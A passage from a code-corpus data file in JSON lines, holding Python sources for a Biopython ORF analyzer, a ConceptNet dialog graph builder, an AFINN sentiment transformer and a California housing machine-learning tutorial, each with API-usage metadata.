"abc.abstractproperty", "line_number": 1073, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1101, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1109, "usage_type": "call"}, {"api_name": "six.get_unbound_function", "line_number": 1110, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1117, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1132, "usage_type": "name"}, {"api_name": 
"six.with_metaclass", "line_number": 1188, "usage_type": "call"}, {"api_name": "abc.abstractproperty", "line_number": 1208, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1231, "usage_type": "name"}, {"api_name": "six.with_metaclass", "line_number": 1247, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 1247, "usage_type": "argument"}, {"api_name": "django.db.models.fields.related_descriptors.ForwardManyToOneDescriptor", "line_number": 1253, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 1282, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 1286, "usage_type": "call"}, {"api_name": "django.db.models.get_models", "line_number": 1375, "usage_type": "call"}, {"api_name": "six.with_metaclass", "line_number": 1421, "usage_type": "call"}, {"api_name": "flash.settings.DEFAULT_TIMEOUT", "line_number": 1424, "usage_type": "attribute"}, {"api_name": "flash.settings", "line_number": 1424, "usage_type": "name"}, {"api_name": "abc.abstractproperty", "line_number": 1426, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1489, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.fields.GenericForeignKey", "line_number": 1490, "usage_type": "argument"}, {"api_name": "loader.object_or_none", "line_number": 1526, "usage_type": "call"}, {"api_name": "loader.object_or_404", "line_number": 1530, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 1593, "usage_type": "call"}]}
+{"seq_id": "6290291944", "text": "from Bio.Alphabet import DNAAlphabet\nfrom Bio.Data.CodonTable import CodonTable, TranslationError, ambiguous_dna_by_id\nfrom Bio.Seq import Seq\nfrom Bio.SeqFeature import SeqFeature, ExactPosition\nfrom Bio.SeqRecord import SeqRecord\n\nfrom src.Base import Base\n\n__author__ = \"ronmor\"\n\n\ndef _cleave_after_stop_codon(nucleotide_seq, table):\n \"\"\"\n :param nucleotide_seq: The DNA sequence to cleave\n :type nucleotide_seq: Seq\n :param table:\n :type table: CodonTable\n :return:\n :rtype: list[Seq]\n :raises: ValueError if not a nucleotide sequence\n \"\"\"\n _check_if_nucleotide_sequence(nucleotide_seq)\n nucleotide_seq = nucleotide_seq.upper()\n stop_codons = table.stop_codons\n cleaved_at_stop = []\n codon = \"\"\n after_stop_index = 0\n for index, letter in enumerate(nucleotide_seq):\n codon += letter\n if codon in stop_codons:\n cleaved_at_stop.append(nucleotide_seq[after_stop_index:index + 1])\n after_stop_index = index + 1\n if len(codon) == 3:\n codon = \"\"\n return cleaved_at_stop\n\n\ndef _check_if_nucleotide_sequence(nucleotide_sequence):\n if not isinstance(nucleotide_sequence, Seq):\n raise ValueError(\"Expected a sequence, got %s instead\" % type(nucleotide_sequence))\n elif not isinstance(nucleotide_sequence.alphabet, DNAAlphabet):\n raise ValueError(\"Expected DNA alphabet, found %s instead\" % type(nucleotide_sequence.alphabet))\n\n\nclass DownstreamAnalyzer(object):\n def __init__(self, downstream_sequence, coding_sequence_start_index, genbank_file, is_complementary=False):\n \"\"\"\n :param downstream_sequence: The sequence downstream of the a gene which we want to analyze.\n :type downstream_sequence: Seq\n :param coding_sequence_start_index: The start index of the gene in the genbank-file features list.\n :type coding_sequence_start_index: int\n :param genbank_file:\n :type genbank_file: SeqRecord\n :param is_complementary:\n :type is_complementary: bool\n :raise: ValueError if the object doesn't hold a genbank documentation or if the genbank file isn't DNA\n \"\"\"\n self.__downstream_seq = downstream_sequence\n self.__start_index = coding_sequence_start_index\n self. 
__is_complementing = is_complementary\n if genbank_file is not None:\n if not isinstance(genbank_file, SeqRecord):\n raise ValueError(\n \"genbank file type expected to be of type SeqRecord, found %s instead\" % type(self.__genbank_file))\n _check_if_nucleotide_sequence(genbank_file.seq)\n self.__genbank_file = genbank_file\n\n @property\n def downstream_seq(self):\n return self.__downstream_seq\n\n @property\n def is_complementing(self):\n return self.__is_complementing\n\n def find_possible_proteins_in_downstream_sequence(self, table_id=11):\n \"\"\"\n For the downstream sequence, get all possible CDSs and return their matching proteins.\n ORF is searched for the entire sequence and not for the complement strand (3 total).\n Use only for sequences known not to have introns!\n :param table_id: ID of translation table as appears on https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n Defaults to 11.\n :type table_id: int\n :return: ORF index (0-2) to list of proteins (type Seq)\n :rtype: dict[int, list[Seq]]\n \"\"\"\n table = ambiguous_dna_by_id[table_id]\n orfs = self._find_possible_orfs_on_positive_strand(self.__downstream_seq)\n possible_proteins = {}\n for orf_num, orf in enumerate(orfs):\n cleaved_frame = _cleave_after_stop_codon(orf, table)\n for possible_cds in cleaved_frame:\n try:\n possible_protein = possible_cds.translate(table=table, cds=True)\n except TranslationError:\n continue\n else:\n possible_proteins[orf_num] = possible_protein\n return possible_proteins\n\n @staticmethod\n def _find_possible_orfs_on_positive_strand(nucleotide_sequence):\n \"\"\"\n Only find the orfs in the downstream sequence given, WITHOUT the complementing strand.\n :param nucleotide_sequence: the sequence to find the\n :rtype: [Seq]\n :return:\n \"\"\"\n for frame in range(3):\n length = 3 * ((len(nucleotide_sequence) - frame) // 3) # Multiple of three\n yield nucleotide_sequence[frame:frame + length]\n\n def _find_next_gene_index_in_genbank(self):\n \"\"\"\n :return:\n :rtype: int\n \"\"\"\n feature = None\n for feature in self.__genbank_file.features:\n if feature.location.start >= self.__start_index:\n break\n index = self.__genbank_file.features.index(feature) - 1 if feature else None\n if self.__is_complementing:\n return index\n elif index is not None:\n try:\n while self.__start_index < self.__genbank_file.features[index].location.start:\n index += 1\n # End of list\n except IndexError:\n index -= 1\n return index\n\n def generate_downstream_cdss(self):\n \"\"\"\n find all the features (usually CDSs) downstream of the gene, going towards the 3' end in both strands.\n :return:\n \"\"\"\n next_feature_index = self._find_next_gene_index_in_genbank()\n if next_feature_index is None:\n raise ValueError(\"Could not find a feature downstream\")\n downstream_feature_index = next_feature_index\n while abs(self.__genbank_file.features[downstream_feature_index].location.start -\n self.__genbank_file.features[next_feature_index].location.start) <= len(self.__downstream_seq):\n if not (self.__genbank_file.features[downstream_feature_index].strand == Base.COMPLEMENT\n and not self.__is_complementing):\n feature_to_yield = self.__genbank_file.features[downstream_feature_index]\n if hasattr(feature_to_yield, 'type') and feature_to_yield.type == 'CDS' and \\\n isinstance(feature_to_yield.location.start, ExactPosition) and \\\n isinstance(feature_to_yield.location.end, ExactPosition):\n yield feature_to_yield\n if self.__is_complementing:\n downstream_feature_index -= 1\n else:\n 
downstream_feature_index += 1\n if downstream_feature_index < 0 or downstream_feature_index > len(self.__genbank_file.features)-1:\n break\n\n def translate_feature(self, feature, table=11):\n \"\"\"\n :param feature: a feature of a genome. has to be RNA or DNA\n :type feature: SeqFeature\n :param table: The table used for translation: https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi\n :type table: int\n :rtype: Seq\n \"\"\"\n is_cds = True if feature.type == 'CDS' else False\n return feature.extract(self.__genbank_file).seq.translate(table=table, cds=is_cds)\n\n def __eq__(self, other):\n if not isinstance(other, type(self)):\n raise ValueError(\"Expected instance of %s got %s instead\" % (type(self), type(other)))\n return self.__downstream_seq == other.downstream_seq\n", "repo_name": "ronmoran/weizmann-aimr", "sub_path": "src/DownstreamAnalyzer.py", "file_name": "DownstreamAnalyzer.py", "file_ext": "py", "file_size_in_byte": 7434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.Seq.Seq", "line_number": 39, "usage_type": "argument"}, {"api_name": "Bio.Alphabet.DNAAlphabet", "line_number": 41, "usage_type": "argument"}, {"api_name": "Bio.SeqRecord.SeqRecord", "line_number": 62, "usage_type": "argument"}, {"api_name": "Bio.Data.CodonTable.ambiguous_dna_by_id", "line_number": 87, "usage_type": "name"}, {"api_name": "Bio.Data.CodonTable.TranslationError", "line_number": 95, "usage_type": "name"}, {"api_name": "src.Base.Base.COMPLEMENT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "src.Base.Base", "line_number": 145, "usage_type": "name"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 149, "usage_type": "argument"}, {"api_name": "Bio.SeqFeature.ExactPosition", "line_number": 150, "usage_type": "argument"}]}
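
[Editor's example] The Biopython record above scans three forward reading frames and cleaves candidate coding sequences after each stop codon. A dependency-free sketch of the same frame/cleave logic on a plain string; the hard-coded stop-codon set below is an assumption (the standard genetic code, whose stops table 11 shares), whereas the record pulls it from a CodonTable:

STOP_CODONS = {"TAA", "TAG", "TGA"}  # assumption: standard-code stop codons

def frames(seq):
    # Yield the three forward reading frames, trimmed to whole codons.
    for offset in range(3):
        length = 3 * ((len(seq) - offset) // 3)
        yield seq[offset:offset + length]

def cleave_after_stops(frame):
    # Split a frame into chunks, each chunk ending at a stop codon.
    chunks, start = [], 0
    for i in range(0, len(frame), 3):
        if frame[i:i + 3] in STOP_CODONS:
            chunks.append(frame[start:i + 3])
            start = i + 3
    return chunks

for f in frames("ATGAAATGAGGGTAACC"):
    print(cleave_after_stops(f))  # frame 0 yields ['ATGAAATGA', 'GGGTAA']
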
+{"seq_id": "8258637633", "text": "import torch\nimport numpy as np\nimport os\nimport pickle\n\nfrom tqdm import tqdm\nfrom datasets import load_dataset\nfrom sentence_transformers import SentenceTransformer\n\nfrom message_enritcher.trie_structure import Trie\nfrom message_enritcher.knowledge_extractor import KnowledgeExtractor\n\nclass GraphBuilder:\n def __init__(self,\n path='/data/conceptNet_embs',\n save_path='datasets/',\n emb_file_name='conceptnet_embs',\n data_file_name='dialogs_data'):\n self.path = path\n self.save_path = save_path\n self.data_file_name = data_file_name\n self.emb_file_name = emb_file_name\n self.embeddings = None\n self.trie = None\n self.dataset = None\n self.conceptNet = None\n self.start_index = None\n self.set_dataset()\n self.set_embeddings()\n self.set_trie()\n self.set_start_index()\n self.preprocess_dialog_data()\n\n def set_dataset(self):\n print(\"load and save dataset\")\n dataset = load_dataset(\"daily_dialog\")\n self.train_dataset = dataset['train']['dialog']\n self.test_dataset = dataset['test']['dialog']\n self.val_dataset = dataset['validation']['dialog']\n conceptNet = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n self.conceptNet = conceptNet['train']\n\n def preprocess_dialog_data(self):\n for i, conv in enumerate(self.train_dataset):\n for j, msg in enumerate(conv):\n self.train_dataset[i][j] = msg.strip()\n self.train_dataset = [data[:10] for data in self.train_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.test_dataset):\n for j, msg in enumerate(conv):\n self.test_dataset[i][j] = msg.strip()\n self.test_dataset = [data[:10] for data in self.test_dataset if len(data) > 4]\n\n for i, conv in enumerate(self.val_dataset):\n for j, msg in enumerate(conv):\n self.val_dataset[i][j] = msg.strip()\n self.val_dataset = [data[:10] for data in self.val_dataset if len(data) > 4]\n\n def set_embeddings(self):\n print(\"load and save embeddings\")\n self.embeddings = self.get_embeddings()\n\n def set_trie(self):\n print(\"build trie datastructure\")\n self.trie = Trie()\n self.trie.insert_dataset(self.conceptNet, self.get_embeddings())\n del self.conceptNet\n del self.embeddings\n\n def get_embeddings(self, numpy_array=True):\n try:\n embeddings = self.load_tensor(file_name=self.emb_file_name, path=self.path)\n except:\n print(\"no saved embeddings could be found\")\n dataset = load_dataset(\"peandrew/conceptnet_en_nomalized\")\n model = SentenceTransformer('all-MiniLM-L6-v2')\n embeddings = model.encode(dataset['train']['arg2'])\n self.save_tensor(embeddings, file_name=self.emb_file_name, path=self.path)\n if numpy_array:\n embeddings = embeddings.cpu().detach().numpy()\n return embeddings\n\n def load_tensor(self, file_name, path):\n f = os.path.join(path, f\"{file_name}.pt\")\n return torch.load(f)\n\n def save_tensor(self, tensor, file_name, path):\n if not torch.is_tensor(tensor):\n tensor = torch.from_numpy(tensor)\n f = os.path.join(path, f\"{file_name}.pt\")\n torch.save(tensor, f)\n\n def set_start_index(self):\n print(\"load index\")\n file_list = os.listdir(self.path)\n max_end = 0\n try:\n for file_name in file_list:\n if self.data_file_name in file_name:\n f = file_name.split('_')[-1]\n start, end = f.split('-')\n end = int(end[:-2])\n max_end = max(end, max_end)\n except:\n print(f\"could not find a file that contains this {self.data_file_name} string\")\n self.start_index = max_end\n\n def from_dialog_to_graph(self,\n start_index,\n n_hops=4,\n save_data=False,\n save_steps=100,\n coll_nodes_hop=100,\n 
num_persons=2):\n\n save_folder_name = f'dd_hop{n_hops}_k{coll_nodes_hop}/'\n\n all_person_list = ['Max', 'Eva', 'Mareike', 'Sebastian', 'Holga']\n dialogs = []\n new_data = True\n datasets = [0, 1, 2]\n\n for data_idx in datasets:\n if data_idx == 0:\n dataset = self.test_dataset\n folder_name = \"test/data/raw/\"\n data_filename = 'test_data'\n elif data_idx == 1:\n dataset = self.val_dataset\n folder_name = \"val/data/raw/\"\n data_filename = 'val_data'\n else:\n dataset = self.train_dataset\n folder_name = \"train/data/raw/\"\n data_filename = 'train_data'\n\n end_index = len(dataset)\n start = start_index\n\n for index, conv in tqdm(enumerate(dataset[start_index:end_index], start=start_index),\n total=end_index - start_index):\n new_data = True\n person_list = np.char.array([all_person_list[person % num_persons] for person in range(len(conv))])\n person_msg_relations = np.char.array(['speak by' for _ in range(len(conv))])\n person_msg_edges = np.char.array([person_list, conv, person_msg_relations]).T\n\n message_subgrphs = []\n for i, msg in enumerate(conv):\n message_edges = {}\n msg_sub = KnowledgeExtractor(msg, self.trie, i % num_persons)\n for hop in range(n_hops):\n ex_nodes = msg_sub.new_hop(k=coll_nodes_hop)\n if ex_nodes == 0:\n break\n\n message_edges['person_msg'] = person_msg_edges[i]\n message_edges['msg_knowledge'] = msg_sub.data['msg_knowledge_edges']\n message_edges['knowledge_knowledge'] = msg_sub.graph_edges\n\n message_subgrphs.append(message_edges)\n\n dialogs.append(message_subgrphs)\n if save_data:\n if len(dialogs) >= save_steps:\n pickle.dump(dialogs, open(\n f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n start = index + 1\n del dialogs\n dialogs = []\n new_data = False\n if save_data and new_data:\n pickle.dump(dialogs,\n open(f\"{self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\",\n \"wb\"))\n del dialogs\n dialogs = []\n new_data = False\n print(\n f\"save file: \\t {data_filename}_{start}-{index}.p to: \\t {self.save_path + save_folder_name + folder_name}{data_filename}_{start}-{index}.p\")", "repo_name": "ShiraTUB/ActiveDoc", "sub_path": "DiaTransNet/data/graph_builder.py", "file_name": "graph_builder.py", "file_ext": "py", "file_size_in_byte": 7270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datasets.load_dataset", "line_number": 36, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 40, "usage_type": "call"}, {"api_name": "message_enritcher.trie_structure.Trie", "line_number": 65, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 75, "usage_type": "call"}, {"api_name": "sentence_transformers.SentenceTransformer", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 91, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 95, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 140, 
"usage_type": "call"}, {"api_name": "numpy.char.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.char.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.char", "line_number": 145, "usage_type": "attribute"}, {"api_name": "message_enritcher.knowledge_extractor.KnowledgeExtractor", "line_number": 150, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 165, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "3665822992", "text": "from sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom nltk.tokenize import word_tokenize\nfrom utils.Parameters import Parameters\nimport numpy as np\nfrom pymongo import MongoClient\nparameters = Parameters()\nfrom afinn import Afinn\n\n\nafinn = Afinn()\n\n\"\"\"\nconfigs:\n0- No feature\n1- sentence polarity TODO:(needs parameterization )\n2- num_polarity_words / num_neutral_words\n3- mean_pos mean_neg\n4- median_pos median_neg\n\"\"\"\n\n\nclass AfinnTransformer(TransformerMixin, BaseEstimator):\n features = {'afinn_value': 0, 'polar_neutral_ratio': 0 }\n\n def __init__(self, featureSetConfiguration = 1 ):\n self.featureSetConfiguration = featureSetConfiguration\n\n def transform(self, X, **transform_params):\n\n mongoClient = MongoClient('localhost', 27017)\n ffCorpus = mongoClient.FACTFEELCorpus\n temp = [\n [0 for f in sorted(AfinnTransformer.features.keys())]\n for s in X\n ]\n # document_score\n if self.featureSetConfiguration == 1:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_documet = currentDocument['raw'].lower()\n b = afinn.score(raw_documet)\n features_to_set['afinn_value'] = b\n\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # num_polarity_words / num_neutral_words\n elif self.featureSetConfiguration == 2:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument = documentCollection.find_one({'document_id': document})\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b = len(polar)/len(neutral)\n else:\n b = 0\n features_to_set['polar_neutral_ratio'] = b\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n # mean_pos mean_neg\n elif self.featureSetConfiguration == 3:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = AfinnTransformer.features\n # current learning instance info from database\n currentDocument= documentCollection.find_one({'document_id': document })\n raw_document = currentDocument['raw'].lower()\n\n words = word_tokenize(raw_document)\n scores_list = [afinn.score(word) for word in words]\n\n neutral = [zero for zero in scores_list if zero==0]\n polar = [pol for pol in scores_list if pol != 0]\n\n if(neutral !=[] and polar!=[]):\n b_r = len(polar)/len(neutral)\n else:\n b_r=0\n\n b_a = afinn.score(raw_document)\n features_to_set['afinn_value'] = b_a\n features_to_set['polar_neutral_ratio'] = b_r\n temp.append([features_to_set[key] for key in sorted(features_to_set.keys())])\n\n min_max_scaler = MinMaxScaler()\n temp = min_max_scaler.fit_transform(temp)\n # median_pos median_neg\n elif self.featureSetConfiguration == 4:\n documentCollection = ffCorpus.documents\n temp = []\n for document in X:\n features_to_set = {'polar/neutral': 0}\n\n mongoClient.close()\n features = np.array(temp)\n #print('AfinnTransformer:' , 
self.featureSetConfiguration,' ### X:',len(X),'len(features):',len(features))\n return features\n\n def fit(self, X, y=None, **fit_params):\n return self\n\n ## names are related to featureSetConfiguration\n def get_feature_names(self):\n return sorted(AfinnTransformer.features.keys())\n\n\n\n\n\n\n", "repo_name": "ei08047/ArgTasks", "sub_path": "ArgMine/ffd_en/Transformers/AfinnTransformer.py", "file_name": "AfinnTransformer.py", "file_ext": "py", "file_size_in_byte": 4616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.Parameters.Parameters", "line_number": 7, "usage_type": "call"}, {"api_name": "afinn.Afinn", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 23, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 23, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 31, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 50, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 84, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 85, "usage_type": "call"}, {"api_name": "afinn.score", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}]}
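
[Editor's example] The AfinnTransformer record above wraps AFINN valence scores in scikit-learn's fit/transform protocol. A pared-down sketch of just that contract, scoring raw strings directly instead of resolving document ids through MongoDB as the record does; it assumes only the `afinn` package the record itself imports:

import numpy as np
from afinn import Afinn
from sklearn.base import BaseEstimator, TransformerMixin

afinn = Afinn()  # same module-level scorer the record uses

class MinimalAfinnTransformer(BaseEstimator, TransformerMixin):
    # Unlike the record, this scores the documents passed in directly.
    def fit(self, X, y=None):
        return self  # stateless: nothing to learn

    def transform(self, X):
        # One feature per document: the summed AFINN valence score.
        return np.array([[afinn.score(doc)] for doc in X])

print(MinimalAfinnTransformer().fit_transform(
    ["good great love", "bad awful hate"]))
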
+{"seq_id": "18815876090", "text": "from __future__ import division, print_function, unicode_literals\n\nimport os\nimport tarfile\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom six.moves import urllib\nfrom future_encoders import ColumnTransformer, OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import StratifiedShuffleSplit, train_test_split, cross_val_score, GridSearchCV\nfrom sklearn.pipeline import FeatureUnion, Pipeline\nfrom sklearn.preprocessing import LabelEncoder, LabelBinarizer, StandardScaler, Imputer\nfrom sklearn.ensemble import RandomForestRegressor\n\nwarnings.filterwarnings(action=\"ignore\", message=\"^internal gelsd\")\n\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 2000)\n\nnp.random.seed(42)\n\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\n\n\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True): # no *args or **kargs\n self.add_bedrooms_per_room = add_bedrooms_per_room\n\n def fit(self, X, y=None):\n return self # nothing else to do\n\n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household,\n bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\n\n# class DataFrameSelector(BaseEstimator, TransformerMixin):\n# def __init__(self, attribute_names):\n# self.attribute_names = attribute_names\n#\n# def fit(self, X, y=None):\n# return self\n#\n# def transform(self, X):\n# return X[self.attribute_names].values\n\n\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"end_to_end_project\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"datasets/housing\"\nHOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + \"/housing.tgz\"\n\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\n\ndef income_cat_proportions(data):\n return data[\"income_cat\"].value_counts() / len(data)\n\n\ndef display_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard deviation:\", scores.std())\n\n\nhousing = 
load_housing_data()\n\nprint(housing.head(30))\nprint(housing.info())\nprint(housing[\"ocean_proximity\"].value_counts())\nprint(housing.describe())\n\nhousing[\"income_cat\"] = np.ceil(housing[\"median_income\"] / 1.5)\nhousing[\"income_cat\"].where(housing[\"income_cat\"] < 5, 5.0, inplace=True)\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing[\"income_cat\"]):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\nprint(strat_test_set[\"income_cat\"].value_counts() / len(strat_test_set))\nprint(housing[\"income_cat\"].value_counts() / len(housing))\n\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\ncompare_props = pd.DataFrame({\n \"Overall\": income_cat_proportions(housing),\n \"Stratified\": income_cat_proportions(strat_test_set),\n \"Random\": income_cat_proportions(test_set),\n}).sort_index()\ncompare_props[\"Rand. %error\"] = 100 * compare_props[\"Random\"] / compare_props[\"Overall\"] - 100\ncompare_props[\"Strat. %error\"] = 100 * compare_props[\"Stratified\"] / compare_props[\"Overall\"] - 100\nprint(compare_props)\n\nfor set_ in (strat_train_set, strat_test_set):\n set_.drop([\"income_cat\"], axis=1, inplace=True)\n\n# visualizando os dados\n\nhousing = strat_train_set.copy()\n\n# california_img = mpimg.imread(PROJECT_ROOT_DIR + '/images/end_to_end_project/california.png')\n# ax = housing.plot(kind=\"scatter\", x=\"longitude\", y=\"latitude\", figsize=(10,7),\n# s=housing['population']/100, label=\"Population\",\n# c=\"median_house_value\", cmap=plt.get_cmap(\"jet\"),\n# colorbar=False, alpha=0.4,\n# )\n# plt.imshow(california_img, extent=[-124.55, -113.80, 32.45, 42.05], alpha=0.5,\n# cmap=plt.get_cmap(\"jet\"))\n# plt.ylabel(\"Latitude\", fontsize=14)\n# plt.xlabel(\"Longitude\", fontsize=14)\n#\n# prices = housing[\"median_house_value\"]\n# tick_values = np.linspace(prices.min(), prices.max(), 11)\n# cbar = plt.colorbar()\n# cbar.ax.set_yticklabels([\"$%dk\"%(round(v/1000)) for v in tick_values], fontsize=14)\n# cbar.set_label('Median House Value', fontsize=16)\n#\n# plt.legend(fontsize=16)\n# save_fig(\"california_housing_prices_plot\")\n# plt.show()\n\ncorr_matrix = housing.corr()\nprint(corr_matrix[\"median_house_value\"].sort_values(ascending=False))\n\n# attributes = [\"median_house_value\", \"median_income\", \"total_rooms\",\n# \"housing_median_age\"]\n# scatter_matrix(housing[attributes], figsize=(12, 8))\n# save_fig(\"scatter_matrix_plot\")\n\nhousing[\"rooms_per_household\"] = housing[\"total_rooms\"] / housing[\"households\"]\nhousing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"] / housing[\"total_rooms\"]\nhousing[\"population_per_household\"] = housing[\"population\"] / housing[\"households\"]\n\ncorr_matrix = housing.corr()\ncorr_matrix[\"median_house_value\"].sort_values(ascending=False)\n\n# preparando para machine learning\nhousing = strat_train_set.drop(\"median_house_value\", axis=1)\nhousing_labels = strat_train_set[\"median_house_value\"].copy()\n\nhousing.dropna(subset=[\"total_bedrooms\"]) # remove as linhas que contêm valores nulos\nhousing.drop(\"total_bedrooms\", axis=1) # remove a coluna inteira\nmedian = housing[\"total_bedrooms\"].median()\nhousing[\"total_bedrooms\"].fillna(median) # substitui os valores nulos pela mediana\n\nimputer = Imputer(strategy=\"median\")\nhousing_num = housing.drop(\"ocean_proximity\", axis=1) # remover atributos não numéricos\nimputer.fit(housing_num) # 
